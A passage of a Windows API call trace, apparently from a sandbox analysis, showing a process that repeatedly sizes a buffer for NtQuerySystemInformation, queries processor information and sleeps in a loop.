ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.568] Sleep (dwMilliseconds=0x110) [0239.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.595] Sleep (dwMilliseconds=0x110) [0239.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.615] Sleep (dwMilliseconds=0x110) [0239.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.626] Sleep (dwMilliseconds=0x110) [0239.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.661] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.662] Sleep (dwMilliseconds=0x110) [0239.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.677] Sleep (dwMilliseconds=0x110) [0239.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.709] Sleep (dwMilliseconds=0x110) [0239.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.771] Sleep (dwMilliseconds=0x110) [0239.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.833] Sleep (dwMilliseconds=0x110) [0239.885] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.885] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.885] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.885] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.886] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.886] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.893] Sleep (dwMilliseconds=0x110) [0239.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.912] Sleep (dwMilliseconds=0x110) [0239.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.925] Sleep (dwMilliseconds=0x110) [0239.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.944] Sleep (dwMilliseconds=0x110) [0239.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.990] Sleep (dwMilliseconds=0x110) 